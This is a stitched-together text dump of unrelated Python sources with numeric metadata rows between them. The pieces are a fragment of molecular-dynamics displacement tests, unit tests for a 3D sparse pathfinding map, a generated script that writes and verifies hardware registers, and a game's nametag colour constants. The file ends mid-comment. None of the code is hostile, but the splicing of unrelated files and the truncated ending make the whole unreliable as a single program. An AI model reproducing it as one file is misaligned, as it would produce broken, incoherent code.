np.testing.assert_array_almost_equal(msd_bin[1], (0,4))
np.testing.assert_array_almost_equal(msd_bin[2], (0,9))
np.testing.assert_array_almost_equal(msd_bin[3], (0,0))
# shrink range to lose inner and outer particle
msd_bin,_,_ = fieldkit.simulate.msd_survival_cylinder(r, z, window=1, bins=2, range=(1,3))
self.assertEqual(msd_bin.shape, (2,2))
np.testing.assert_array_almost_equal(msd_bin[0], (0,4))
np.testing.assert_array_almost_equal(msd_bin[1], (0,9))
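# Editor's sketch of the quantity validated above: the mean-squared
# displacement with multiple time origins. This is a hypothetical helper, not
# fieldkit.simulate.msd itself; for traj of shape (frames, N, 3) it mirrors
# the reference loop written out in test_msd.
import numpy as np

def msd_sketch(traj, window):
    msd = np.zeros((window + 1, 3))
    counts = np.zeros(window + 1, dtype=int)
    for i in range(traj.shape[0] - 1):  # every frame is a time origin
        for dt in range(1, min(window + 1, traj.shape[0] - i)):
            dr = traj[i + dt] - traj[i]
            msd[dt] += np.mean(dr * dr, axis=0)  # average over particles, per component
            counts[dt] += 1
    nonzero = counts > 0
    msd[nonzero] /= counts[nonzero][:, None]  # average over time origins
    return msd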
| 52.37224
| 107
| 0.604265
| 2,793
| 16,602
| 3.417472
| 0.07304
| 0.054479
| 0.052174
| 0.226296
| 0.833002
| 0.792666
| 0.760922
| 0.735987
| 0.70571
| 0.698271
| 0
| 0.076228
| 0.19323
| 16,602
| 316
| 108
| 52.537975
| 0.636404
| 0.128238
| 0
| 0.467593
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.003165
| 0.671296
| 1
| 0.023148
| false
| 0
| 0.013889
| 0
| 0.041667
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 8
| cbd12c26351b0f5435c2e5ad6b4aa0d871f5d94c
| 12,732
| py
| Python
| tests/test_maps/test_sparse_3d.py
| ed741/PathBench
| 50fe138eb1f824f49fe1a862705e435a1c3ec3ae
| ["BSD-3-Clause"]
| 46
| 2020-12-25T04:09:15.000Z
| 2022-03-25T12:32:42.000Z
| tests/test_maps/test_sparse_3d.py
| ed741/PathBench
| 50fe138eb1f824f49fe1a862705e435a1c3ec3ae
| ["BSD-3-Clause"]
| 36
| 2020-12-21T16:10:02.000Z
| 2022-01-03T01:42:01.000Z
| tests/test_maps/test_sparse_3d.py
| judicaelclair/PathBenchURO
| 101e67674efdfa8e27e1cf7787dac9fdf99552fe
| ["BSD-3-Clause"]
| 11
| 2021-01-06T23:34:12.000Z
| 2022-03-21T17:21:47.000Z
import unittest
import copy
from unittest.mock import Mock
from algorithms.configuration.entities.agent import Agent
from algorithms.configuration.entities.goal import Goal
from algorithms.configuration.entities.obstacle import Obstacle
from algorithms.configuration.entities.trace import Trace
from algorithms.configuration.maps.dense_map import DenseMap
from algorithms.configuration.maps.sparse_map import SparseMap
from maps.maps import Maps
from simulator.services.debug import DebugLevel
from simulator.services.services import Services
from structures import Size, Point
class TestSparseMap3D(unittest.TestCase):
def test_copy(self) -> None:
map1: SparseMap = Maps.pixel_map_one_obstacle_3d
map2: SparseMap = copy.copy(map1)
self.assertEqual(map1, map2)
def test_deep_copy(self) -> None:
map1: SparseMap = Maps.pixel_map_one_obstacle_3d
map2: SparseMap = copy.deepcopy(map1)
self.assertEqual(map1, map2)
def test_eq(self) -> None:
map1: SparseMap = SparseMap(Size(200, 200, 200),
Agent(Point(20, 20, 20), 10),
[Obstacle(Point(40, 40, 40), 10), Obstacle(Point(100, 100, 100), 40)],
Goal(Point(180, 160, 120), 10))
map2: SparseMap = SparseMap(Size(200, 200, 200),
Agent(Point(20, 20, 20), 10),
[Obstacle(Point(40, 40, 40), 10), Obstacle(Point(100, 100, 100), 40)],
Goal(Point(180, 160, 120), 10))
self.assertEqual(map1, map2)
def test_ne_size(self) -> None:
map1: SparseMap = SparseMap(Size(200, 200, 200),
Agent(Point(20, 20, 20), 10),
[Obstacle(Point(40, 40, 40), 10), Obstacle(Point(100, 100, 100), 40)],
Goal(Point(180, 160, 120), 10))
map2: SparseMap = SparseMap(Size(400, 200, 200),
Agent(Point(20, 20, 20), 10),
[Obstacle(Point(40, 40, 40), 10), Obstacle(Point(100, 100, 100), 40)],
Goal(Point(180, 160, 120), 10))
self.assertNotEqual(map1, map2)
def test_ne_agent(self) -> None:
map1: SparseMap = SparseMap(Size(200, 200, 200),
Agent(Point(20, 20, 20), 10),
[Obstacle(Point(40, 40, 40), 10), Obstacle(Point(100, 100, 100), 40)],
Goal(Point(180, 160, 120), 10))
map2: SparseMap = SparseMap(Size(200, 200, 200),
Agent(Point(20, 10, 20), 10),
[Obstacle(Point(40, 40, 40), 10), Obstacle(Point(100, 100, 100), 40)],
Goal(Point(180, 160, 120), 10))
self.assertNotEqual(map1, map2)
def test_ne_goal(self) -> None:
map1: SparseMap = SparseMap(Size(200, 200, 200),
Agent(Point(20, 20, 20), 10),
[Obstacle(Point(40, 40, 40), 10), Obstacle(Point(100, 100, 100), 40)],
Goal(Point(180, 160, 120), 10))
map2: SparseMap = SparseMap(Size(200, 200, 200),
Agent(Point(20, 20, 20), 10),
[Obstacle(Point(40, 40, 40), 10), Obstacle(Point(100, 100, 100), 40)],
Goal(Point(180, 120, 120), 10))
self.assertNotEqual(map1, map2)
def test_ne_obstacle(self) -> None:
map1: SparseMap = SparseMap(Size(200, 200, 200),
Agent(Point(20, 20, 20), 10),
[Obstacle(Point(40, 40, 40), 10), Obstacle(Point(100, 100, 100), 40)],
Goal(Point(180, 160, 120), 10))
map2: SparseMap = SparseMap(Size(200, 200, 200),
Agent(Point(20, 20, 20), 10),
[Obstacle(Point(40, 40, 40), 10), Obstacle(Point(90, 100, 100), 40)],
Goal(Point(180, 160, 120), 10))
self.assertNotEqual(map1, map2)
def test_ne_all(self) -> None:
map1: SparseMap = SparseMap(Size(200, 200, 200),
Agent(Point(20, 20, 20), 10),
[Obstacle(Point(40, 40, 40), 10), Obstacle(Point(100, 100, 100), 40)],
Goal(Point(180, 160, 120), 10))
map2: SparseMap = SparseMap(Size(100, 200, 200),
Agent(Point(15, 20, 20), 10),
[Obstacle(Point(40, 30, 40), 10), Obstacle(Point(100, 90, 100), 40)],
Goal(Point(180, 150, 120), 10))
self.assertNotEqual(map1, map2)
def test_ne_dense(self) -> None:
map1: SparseMap = SparseMap(Size(20, 20, 20),
Agent(Point(2, 2, 2), 1),
[Obstacle(Point(4, 4, 4), 1), Obstacle(Point(10, 10, 10), 4)],
Goal(Point(18, 16, 14), 1))
map2: DenseMap = SparseMap(Size(20, 20, 20),
Agent(Point(2, 2, 2), 1),
[Obstacle(Point(4, 4, 4), 1), Obstacle(Point(10, 10, 10), 4)],
Goal(Point(18, 16, 14), 1)).convert_to_dense_map()
self.assertNotEqual(map1, map2)
def test_ne_instance(self) -> None:
map1: SparseMap = SparseMap(Size(200, 200, 200),
Agent(Point(20, 20, 20), 10),
[Obstacle(Point(40, 40, 40), 10), Obstacle(Point(100, 100, 100), 40)],
Goal(Point(180, 160, 120), 10))
map2: int = 2
self.assertNotEqual(map1, map2)
def test_eq_dense_map(self) -> None:
map1: DenseMap = DenseMap([
[[DenseMap.CLEAR_ID, DenseMap.CLEAR_ID, DenseMap.CLEAR_ID], [DenseMap.AGENT_ID, DenseMap.CLEAR_ID, DenseMap.CLEAR_ID]],
[[DenseMap.CLEAR_ID, DenseMap.WALL_ID, DenseMap.WALL_ID], [DenseMap.CLEAR_ID, DenseMap.CLEAR_ID, DenseMap.GOAL_ID]]
])
map2: SparseMap = SparseMap(
Size(3, 2, 2),
Agent(Point(0, 1, 0)),
[Obstacle(Point(1, 0, 1)), Obstacle(Point(2, 0, 1))],
Goal(Point(2, 1, 1))
)
self.assertEqual(map2, map1)
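# Editor's note (inferred from the assertions in this file): the DenseMap
# literal is indexed [z][y][x], so AGENT_ID at grid[0][1][0] corresponds to
# Agent(Point(0, 1, 0)) and GOAL_ID at grid[1][1][2] to Goal(Point(2, 1, 1)).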
def test_convert_to_dense_map(self) -> None:
map1: SparseMap = SparseMap(
Size(3, 2, 2),
Agent(Point(0, 1, 0)),
[Obstacle(Point(1, 0, 1)), Obstacle(Point(2, 0, 1))],
Goal(Point(2, 1, 1))
)
map2: DenseMap = map1.convert_to_dense_map()
self.assertEqual(map1, map2)
def test_move_agent_normal(self) -> None:
map1: DenseMap = DenseMap([
[[DenseMap.CLEAR_ID, DenseMap.CLEAR_ID, DenseMap.CLEAR_ID], [DenseMap.AGENT_ID, DenseMap.CLEAR_ID, DenseMap.CLEAR_ID]],
[[DenseMap.CLEAR_ID, DenseMap.WALL_ID, DenseMap.WALL_ID], [DenseMap.CLEAR_ID, DenseMap.CLEAR_ID, DenseMap.GOAL_ID]]
]).convert_to_sparse_map()
map1.move_agent(Point(0, 0, 0))
self.assertEqual(Point(0, 0, 0), map1.agent.position)
self.assertEqual([Trace(Point(0, 0, 0))], map1.trace)
def test_move_agent_no_trace(self) -> None:
map1: SparseMap = DenseMap([
[[DenseMap.CLEAR_ID, DenseMap.CLEAR_ID, DenseMap.CLEAR_ID], [DenseMap.AGENT_ID, DenseMap.CLEAR_ID, DenseMap.CLEAR_ID]],
[[DenseMap.CLEAR_ID, DenseMap.WALL_ID, DenseMap.WALL_ID], [DenseMap.CLEAR_ID, DenseMap.CLEAR_ID, DenseMap.GOAL_ID]]
]).convert_to_sparse_map()
map1.move_agent(Point(0, 0, 0), True)
self.assertEqual(Point(0, 0, 0), map1.agent.position)
self.assertEqual([], map1.trace)
def test_move_agent_out_of_bounds(self) -> None:
map1: SparseMap = DenseMap([
[[DenseMap.CLEAR_ID, DenseMap.CLEAR_ID, DenseMap.CLEAR_ID], [DenseMap.AGENT_ID, DenseMap.CLEAR_ID, DenseMap.CLEAR_ID]],
[[DenseMap.CLEAR_ID, DenseMap.WALL_ID, DenseMap.WALL_ID], [DenseMap.CLEAR_ID, DenseMap.CLEAR_ID, DenseMap.GOAL_ID]]
]).convert_to_sparse_map()
map1.move_agent(Point(-1, 0, 0))
self.assertEqual(Point(0, 1, 0), map1.agent.position)
self.assertEqual([Trace(Point(0, 1, 0))], map1.trace)
def test_is_goal_reached_normal(self) -> None:
map1: SparseMap = DenseMap([
[[DenseMap.CLEAR_ID, DenseMap.CLEAR_ID, DenseMap.CLEAR_ID], [DenseMap.AGENT_ID, DenseMap.CLEAR_ID, DenseMap.CLEAR_ID]],
[[DenseMap.CLEAR_ID, DenseMap.WALL_ID, DenseMap.WALL_ID], [DenseMap.CLEAR_ID, DenseMap.CLEAR_ID, DenseMap.GOAL_ID]]
]).convert_to_sparse_map()
self.assertTrue(map1.is_goal_reached(Point(2, 1, 1)))
def test_is_goal_reached_false(self) -> None:
map1: SparseMap = DenseMap([
[[DenseMap.CLEAR_ID, DenseMap.CLEAR_ID, DenseMap.CLEAR_ID], [DenseMap.AGENT_ID, DenseMap.CLEAR_ID, DenseMap.CLEAR_ID]],
[[DenseMap.CLEAR_ID, DenseMap.WALL_ID, DenseMap.WALL_ID], [DenseMap.CLEAR_ID, DenseMap.CLEAR_ID, DenseMap.GOAL_ID]]
]).convert_to_sparse_map()
self.assertFalse(map1.is_goal_reached(Point(2, 1, 0)))
def test_is_goal_reached_out_of_bounds(self) -> None:
map1: SparseMap = DenseMap([
[[DenseMap.CLEAR_ID, DenseMap.CLEAR_ID, DenseMap.CLEAR_ID], [DenseMap.AGENT_ID, DenseMap.CLEAR_ID, DenseMap.CLEAR_ID]],
[[DenseMap.CLEAR_ID, DenseMap.WALL_ID, DenseMap.WALL_ID], [DenseMap.CLEAR_ID, DenseMap.CLEAR_ID, DenseMap.GOAL_ID]]
]).convert_to_sparse_map()
self.assertFalse(map1.is_goal_reached(Point(-1, -1, -1)))
def test_is_valid_position_normal(self) -> None:
map1: SparseMap = DenseMap([
[[DenseMap.CLEAR_ID, DenseMap.CLEAR_ID, DenseMap.CLEAR_ID], [DenseMap.AGENT_ID, DenseMap.CLEAR_ID, DenseMap.CLEAR_ID]],
[[DenseMap.CLEAR_ID, DenseMap.WALL_ID, DenseMap.WALL_ID], [DenseMap.CLEAR_ID, DenseMap.CLEAR_ID, DenseMap.GOAL_ID]]
]).convert_to_sparse_map()
self.assertTrue(map1.is_agent_valid_pos(Point(0, 0, 0)))
self.assertTrue(map1.is_agent_valid_pos(Point(1, 0, 0)))
self.assertTrue(map1.is_agent_valid_pos(Point(2, 0, 0)))
self.assertTrue(map1.is_agent_valid_pos(Point(0, 0, 1)))
def test_is_valid_position_invalid(self) -> None:
map1: SparseMap = DenseMap([
[[DenseMap.CLEAR_ID, DenseMap.CLEAR_ID, DenseMap.CLEAR_ID], [DenseMap.AGENT_ID, DenseMap.CLEAR_ID, DenseMap.CLEAR_ID]],
[[DenseMap.CLEAR_ID, DenseMap.WALL_ID, DenseMap.WALL_ID], [DenseMap.CLEAR_ID, DenseMap.CLEAR_ID, DenseMap.GOAL_ID]]
]).convert_to_sparse_map()
self.assertFalse(map1.is_agent_valid_pos(Point(1, 0, 1)))
self.assertFalse(map1.is_agent_valid_pos(Point(-1, -1, -1)))
def test_str(self) -> None:
map1: SparseMap = DenseMap([
[[DenseMap.CLEAR_ID, DenseMap.CLEAR_ID, DenseMap.CLEAR_ID], [DenseMap.AGENT_ID, DenseMap.CLEAR_ID, DenseMap.CLEAR_ID]],
[[DenseMap.CLEAR_ID, DenseMap.WALL_ID, DenseMap.WALL_ID], [DenseMap.CLEAR_ID, DenseMap.CLEAR_ID, DenseMap.GOAL_ID]]
]).convert_to_sparse_map()
self.assertEqual("""SparseMap: {
size: Size(3, 2, 2),
agent: Agent: {position: Point(0, 1, 0), radius: 0},
obstacles: {
size: 2,
entities: [
Obstacle: {position: Point(1, 0, 1), radius: 0},
Obstacle: {position: Point(2, 0, 1), radius: 0},
]
},
goal: Goal: {position: Point(2, 1, 1), radius: 0}
}""", str(map1))
def test_str_debug_level_3(self) -> None:
service: Services = Mock()
service.settings.simulator_write_debug_level = DebugLevel.HIGH
map1: SparseMap = DenseMap([
[[DenseMap.CLEAR_ID, DenseMap.CLEAR_ID, DenseMap.CLEAR_ID], [DenseMap.AGENT_ID, DenseMap.CLEAR_ID, DenseMap.CLEAR_ID]],
[[DenseMap.CLEAR_ID, DenseMap.WALL_ID, DenseMap.WALL_ID], [DenseMap.CLEAR_ID, DenseMap.CLEAR_ID, DenseMap.GOAL_ID]]
]).convert_to_sparse_map()
map1._services = service
self.assertEqual("""SparseMap: {
size: Size(3, 2, 2),
agent: Agent: {position: Point(0, 1, 0), radius: 0},
obstacles: {
size: 2,
entities: [
Obstacle: {position: Point(1, 0, 1), radius: 0},
Obstacle: {position: Point(2, 0, 1), radius: 0},
]
},
goal: Goal: {position: Point(2, 1, 1), radius: 0}
}""", str(map1))
| 52.395062
| 131
| 0.570924
| 1,584
| 12,732
| 4.416667
| 0.060606
| 0.172956
| 0.188679
| 0.289308
| 0.873928
| 0.84677
| 0.801458
| 0.783877
| 0.783591
| 0.763722
| 0
| 0.096882
| 0.292256
| 12,732
| 242
| 132
| 52.61157
| 0.679503
| 0
| 0
| 0.623256
| 0
| 0
| 0.048539
| 0
| 0
| 0
| 0
| 0
| 0.134884
| 1
| 0.102326
| false
| 0
| 0.060465
| 0
| 0.167442
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 8
| 1de2cad401e2afd795db2942e7f9a1042c30c846
| 24,933
| py
| Python
| examples/tof-viewer/external/newton_host_driver/src/host_api/examples/python/tests/dms_eval_tests/fc_asm_mscm_qpump/fc_asm_mscm_qpump.py
| rick-yhchen1013/aditof-sdk-rework
| 911465dd1e05dd0b1c5107197b3b4dc3a10f77f9
| ["MIT"]
| 5
| 2021-09-22T10:04:47.000Z
| 2022-02-08T17:55:09.000Z
| examples/tof-viewer/external/newton_host_driver/src/host_api/examples/python/tests/dms_eval_tests/fc_asm_mscm_qpump/fc_asm_mscm_qpump.py
| rick-yhchen1013/aditof-sdk-rework
| 911465dd1e05dd0b1c5107197b3b4dc3a10f77f9
| ["MIT"]
| 99
| 2021-02-01T12:45:09.000Z
| 2022-03-08T09:54:13.000Z
| examples/tof-viewer/external/newton_host_driver/src/host_api/examples/python/tests/dms_eval_tests/fc_asm_mscm_qpump/fc_asm_mscm_qpump.py
| rick-yhchen1013/aditof-sdk-rework
| 911465dd1e05dd0b1c5107197b3b4dc3a10f77f9
| ["MIT"]
| 4
| 2021-08-09T12:32:55.000Z
| 2021-12-13T05:38:55.000Z
#!/usr/bin/env python
""" Script generated from simulation of the fc_asm_mscm_qpump test case.
Usage:
fc_asm_mscm_qpump.py [--no_reset]
Options:
--help Shows this help message.
"""
from __future__ import print_function
from __future__ import absolute_import
from __future__ import unicode_literals
from docopt import docopt
import sys
import io
import os
import time
import struct
import subprocess
import ctypes
from collections import OrderedDict
import threading
from newton_control_main import newton as newton
if __name__ == "__main__":
performReset = True
args = docopt(__doc__, version='0.1')
rc = newton.adi_newton_config( 0 )
if rc != 0:
print( "ERROR: newton.adi_newton_config returned an error (" + str( rc ) + ")." )
sys.exit( rc )
if args['--no_reset']:
performReset = False
if performReset:
newton.adi_reset_newton( newton.PIN_MODE_HSP_DEBUG )
newton.adi_check_register_py( 0x0142, 0x0500 ) # pll_status
newton.adi_write_register( 0x0028, 0x0000 ) # systemClockControl
newton.adi_write_register( 0x0140, 0x0100 ) # pll_ctrl
newton.adi_write_register( 0x0146, 0x00fb ) # power_down_adc_others
newton.adi_write_register( 0x0144, 0x0006 ) # power_down_0
newton.adi_write_register( 0x0146, 0x007b ) # power_down_adc_others
newton.adi_write_register( 0x0144, 0x0004 ) # power_down_0
# Sweep pump_s1 from 0x0000 to 0x3f00 in steps of 0x0100. Each step follows the
# same latch-and-verify protocol: write the value, pulse regif_ctrl (write 0x0105,
# read back 0x0101), confirm errorStatus stays clear, then read the value back.
for pump_s1_value in range(0x0000, 0x4000, 0x0100):
    newton.adi_write_register( 0x014c, pump_s1_value ) # pump_s1
    newton.adi_write_register( 0x0150, 0x0105 ) # regif_ctrl
    newton.adi_check_register_py( 0x0032, 0x0000 ) # errorStatus
    newton.adi_check_register_py( 0x0150, 0x0101 ) # regif_ctrl
    newton.adi_check_register_py( 0x0032, 0x0000 ) # errorStatus
    newton.adi_check_register_py( 0x014c, pump_s1_value ) # pump_s1
| 57.18578
| 85
| 0.770385
| 3,391
| 24,933
| 5.265408
| 0.047774
| 0.1986
| 0.201512
| 0.316662
| 0.956035
| 0.952786
| 0.952786
| 0.948866
| 0.786558
| 0.781406
| 0
| 0.181977
| 0.148157
| 24,933
| 435
| 86
| 57.317241
| 0.658694
| 0.170818
| 0
| 0.615385
| 1
| 0
| 0.003551
| 0.001184
| 0
| 0
| 0.231418
| 0
| 0
| 1
| 0
| false
| 0
| 0.033654
| 0
| 0.033654
| 0.004808
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
383074536cb48704007be50513ddc31988c2b4bc
| 8,025
|
py
|
Python
|
otp/nametag/NametagConstants.py
|
CrankySupertoon01/Toontown-2
|
60893d104528a8e7eb4aced5d0015f22e203466d
|
[
"MIT"
] | 1
|
2021-02-13T22:40:50.000Z
|
2021-02-13T22:40:50.000Z
|
otp/nametag/NametagConstants.py
|
CrankySupertoonArchive/Toontown-2
|
60893d104528a8e7eb4aced5d0015f22e203466d
|
[
"MIT"
] | 1
|
2018-07-28T20:07:04.000Z
|
2018-07-30T18:28:34.000Z
|
otp/nametag/NametagConstants.py
|
CrankySupertoonArchive/Toontown-2
|
60893d104528a8e7eb4aced5d0015f22e203466d
|
[
"MIT"
] | 2
|
2019-12-02T01:39:10.000Z
|
2021-02-13T22:41:00.000Z
|
CFNoQuitButton = 256
CFPageButton = 16
CFQuicktalker = 4
CFQuitButton = 32
CFReversed = 64
CFSndOpenchat = 128
CFSpeech = 1
CFThought = 2
CFTimeout = 8
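# The CF* values above are bit flags: a nametag's chat-balloon state combines
# them with "|" (e.g. CFSpeech | CFTimeout for timed speech; illustrative usage,
# not taken from this file).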
CCNormal = 0
CCNonPlayer = 1
CCSuit = 2
CCToonBuilding = 3
CCSuitBuilding = 4
CCHouseBuilding = 5
CCSpeedChat = 6
NAMETAG_COLORS = {
CCNormal: (
# Normal FG BG
((0.3, 0.3, 0.7, 1.0), (0.8, 0.8, 0.8, 0.5), # Name
(0.0, 0.0, 0.0, 1.0), (1.0, 1.0, 1.0, 1.0)), # Chat
# Click FG BG
((0.3, 0.3, 0.7, 1.0), (0.2, 0.2, 0.2, 0.6), # Name
(1.0, 0.5, 0.5, 1.0), (1.0, 1.0, 1.0, 1.0)), # Chat
# Hover FG BG
((0.5, 0.5, 1.0, 1.0), (1.0, 1.0, 1.0, 1.0), # Name
(0.0, 0.6, 0.6, 1.0), (1.0, 1.0, 1.0, 1.0)), # Chat
# Disable FG BG
((0.3, 0.3, 0.7, 1.0), (0.8, 0.8, 0.8, 0.5), # Name
(0.0, 0.0, 0.0, 1.0), (1.0, 1.0, 1.0, 1.0)), # Chat
),
CCNonPlayer: (
# Normal FG BG
((0.8, 0.4, 0.0, 1.0), (0.8, 0.8, 0.8, 0.5), # Name
(0.0, 0.0, 0.0, 1.0), (1.0, 1.0, 1.0, 1.0)), # Chat
# Click FG BG
((0.8, 0.4, 0.0, 1.0), (0.8, 0.8, 0.8, 0.5), # Name
(0.0, 0.0, 0.0, 1.0), (1.0, 1.0, 1.0, 1.0)), # Chat
# Hover FG BG
((0.8, 0.4, 0.0, 1.0), (0.8, 0.8, 0.8, 0.5), # Name
(0.0, 0.0, 0.0, 1.0), (1.0, 1.0, 1.0, 1.0)), # Chat
# Disable FG BG
((0.8, 0.4, 0.0, 1.0), (0.8, 0.8, 0.8, 0.5), # Name
(0.0, 0.0, 0.0, 1.0), (1.0, 1.0, 1.0, 1.0)), # Chat
),
CCSuit: (
# Normal FG BG
((0.2, 0.2, 0.2, 1.0), (0.8, 0.8, 0.8, 0.5), # Name
(0.0, 0.0, 0.0, 1.0), (1.0, 1.0, 1.0, 1.0)), # Chat
# Click FG BG
((0.2, 0.2, 0.2, 1.0), (0.2, 0.2, 0.2, 0.6), # Name
(1.0, 0.5, 0.5, 1.0), (1.0, 1.0, 1.0, 1.0)), # Chat
# Hover FG BG
((0.4, 0.4, 0.4, 1.0), (1.0, 1.0, 1.0, 0.7), # Name
(0.0, 0.6, 0.6, 1.0), (1.0, 1.0, 1.0, 1.0)), # Chat
# Disable FG BG
((0.2, 0.2, 0.2, 1.0), (0.8, 0.8, 0.8, 0.5), # Name
(0.0, 0.0, 0.0, 1.0), (1.0, 1.0, 1.0, 1.0)), # Chat
),
CCSuitBuilding: (
# Normal FG BG
((0.5, 0.5, 0.5, 1.0), (0.8, 0.8, 0.8, 0.5), # Name
(0.0, 0.0, 0.0, 1.0), (1.0, 1.0, 1.0, 1.0)), # Chat
# Click FG BG
((0.5, 0.5, 0.5, 1.0), (0.2, 0.2, 0.2, 0.6), # Name
(1.0, 0.5, 0.5, 1.0), (1.0, 1.0, 1.0, 1.0)), # Chat
# Hover FG BG
((0.7, 0.7, 0.7, 1.0), (1.0, 1.0, 1.0, 0.7), # Name
(0.0, 0.6, 0.6, 1.0), (1.0, 1.0, 1.0, 1.0)), # Chat
# Disable FG BG
((0.5, 0.5, 0.5, 1.0), (0.8, 0.8, 0.8, 0.5), # Name
(0.0, 0.0, 0.0, 1.0), (1.0, 1.0, 1.0, 1.0)), # Chat
),
CCToonBuilding: (
# Normal FG BG
((0.2, 0.6, 0.9, 1.0), (0.8, 0.8, 0.8, 0.5), # Name
(0.0, 0.0, 0.0, 1.0), (1.0, 1.0, 1.0, 1.0)), # Chat
# Click FG BG
((0.2, 0.6, 0.9, 1.0), (0.8, 0.8, 0.8, 0.5), # Name
(0.0, 0.0, 0.0, 1.0), (1.0, 1.0, 1.0, 1.0)), # Chat
# Hover FG BG
((0.2, 0.6, 0.9, 1.0), (0.8, 0.8, 0.8, 0.5), # Name
(0.0, 0.0, 0.0, 1.0), (1.0, 1.0, 1.0, 1.0)), # Chat
# Disable FG BG
((0.2, 0.6, 0.9, 1.0), (0.8, 0.8, 0.8, 0.5), # Name
(0.0, 0.0, 0.0, 1.0), (1.0, 1.0, 1.0, 1.0)), # Chat
),
CCHouseBuilding: (
# Normal FG BG
((0.2, 0.6, 0.9, 1.0), (0.8, 0.8, 0.8, 0.5), # Name
(0.0, 0.0, 0.0, 1.0), (1.0, 1.0, 1.0, 1.0)), # Chat
# Click FG BG
((0.2, 0.2, 0.5, 1.0), (0.2, 0.2, 0.2, 0.6), # Name
(1.0, 0.5, 0.5, 1.0), (1.0, 1.0, 1.0, 1.0)), # Chat
# Hover FG BG
((0.5, 0.5, 1.0, 1.0), (1.0, 1.0, 1.0, 1.0), # Name
(0.0, 0.6, 0.6, 1.0), (1.0, 1.0, 1.0, 1.0)), # Chat
# Disable FG BG
((0.0, 0.6, 0.2, 1.0), (0.8, 0.8, 0.8, 0.5), # Name
(0.0, 0.0, 0.0, 1.0), (1.0, 1.0, 1.0, 1.0)), # Chat
),
CCSpeedChat: (
# Normal FG BG
((0.0, 0.6, 0.2, 1.0), (0.8, 0.8, 0.8, 0.5), # Name
(0.0, 0.0, 0.0, 1.0), (1.0, 1.0, 1.0, 1.0)), # Chat
# Click FG BG
((0.0, 0.5, 0.0, 1.0), (0.5, 0.5, 0.5, 0.6), # Name
(1.0, 0.5, 0.5, 1.0), (1.0, 1.0, 1.0, 1.0)), # Chat
# Hover FG BG
((0.0, 0.7, 0.2, 1.0), (1.0, 1.0, 1.0, 0.7), # Name
(0.0, 0.6, 0.6, 1.0), (1.0, 1.0, 1.0, 1.0)), # Chat
# Disable FG BG
((0.0, 0.6, 0.2, 1.0), (0.8, 0.8, 0.8, 0.5), # Name
(0.0, 0.0, 0.0, 1.0), (1.0, 1.0, 1.0, 1.0)), # Chat
)
}
ARROW_COLORS = {
CCSuit: (0.8, 0.4, 0.0, 1.0),
}
DEFAULT_WORDWRAPS = {
CCNormal: 7.5,
CCNonPlayer: 7.5,
CCSuit: 7.5,
CCToonBuilding: 8.5,
CCSuitBuilding: 8.5,
CCHouseBuilding: 10.0,
CCSpeedChat: 7.5
}
WTNormal = 0
WTQuickTalker = 1
WTSystem = 2
WTBattleSOS = 3
WTEmote = 4
WTToontownBoardingGroup = 5
WHISPER_COLORS = {
WTNormal: (
# Normal FG BG
((0.0, 0.0, 0.0, 1.0), (0.2, 0.6, 0.8, 0.6)),
# Click FG BG
((1.0, 0.5, 0.5, 1.0), (1.0, 1.0, 1.0, 0.8)),
# Hover FG BG
((0.0, 0.0, 0.0, 1.0), (0.2, 0.7, 0.9, 0.6)),
# Disable FG BG
((0.0, 0.0, 0.0, 1.0), (0.2, 0.7, 0.8, 0.6))
),
WTQuickTalker: (
# Normal FG BG
((0.0, 0.0, 0.0, 1.0), (0.2, 0.6, 0.8, 0.6)),
# Click FG BG
((1.0, 0.5, 0.5, 1.0), (1.0, 1.0, 1.0, 0.8)),
# Hover FG BG
((0.0, 0.0, 0.0, 1.0), (0.2, 0.7, 0.9, 0.6)),
# Disable FG BG
((0.0, 0.0, 0.0, 1.0), (0.2, 0.7, 0.8, 0.6))
),
WTSystem: (
# Normal FG BG
((0.0, 0.0, 0.0, 1.0), (0.8, 0.3, 0.6, 0.6)),
# Click FG BG
((1.0, 0.5, 0.5, 1.0), (1.0, 1.0, 1.0, 0.8)),
# Hover FG BG
((0.0, 0.0, 0.0, 1.0), (0.8, 0.4, 1.0, 0.6)),
# Disable FG BG
((0.0, 0.0, 0.0, 1.0), (0.8, 0.3, 0.6, 0.6))
),
WTBattleSOS: (
# Normal FG BG
((0.0, 0.0, 0.0, 1.0), (0.8, 0.3, 0.6, 0.6)),
# Click FG BG
((1.0, 0.5, 0.5, 1.0), (1.0, 1.0, 1.0, 0.8)),
# Hover FG BG
((0.0, 0.0, 0.0, 1.0), (0.8, 0.4, 0.0, 0.8)),
# Disable FG BG
((0.0, 0.0, 0.0, 1.0), (0.8, 0.3, 0.6, 0.6))
),
WTEmote: (
# Normal FG BG
((0.0, 0.0, 0.0, 1.0), (0.9, 0.5, 0.1, 0.6)),
# Click FG BG
((1.0, 0.5, 0.5, 1.0), (1.0, 1.0, 1.0, 0.8)),
# Hover FG BG
((0.0, 0.0, 0.0, 1.0), (0.9, 0.6, 0.2, 0.6)),
# Disable FG BG
((0.0, 0.0, 0.0, 1.0), (0.9, 0.6, 0.1, 0.6))
),
WTToontownBoardingGroup: (
# Normal FG BG
((0.0, 0.0, 0.0, 1.0), (0.9, 0.5, 0.1, 0.6)),
# Click FG BG
((1.0, 0.5, 0.5, 1.0), (1.0, 1.0, 1.0, 0.8)),
# Hover FG BG
((0.0, 0.0, 0.0, 1.0), (0.9, 0.6, 0.2, 0.6)),
# Disable FG BG
((0.0, 0.0, 0.0, 1.0), (0.9, 0.6, 0.1, 0.6))
)
}
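# Note: `base` below is the global ShowBase instance that Panda3D injects into
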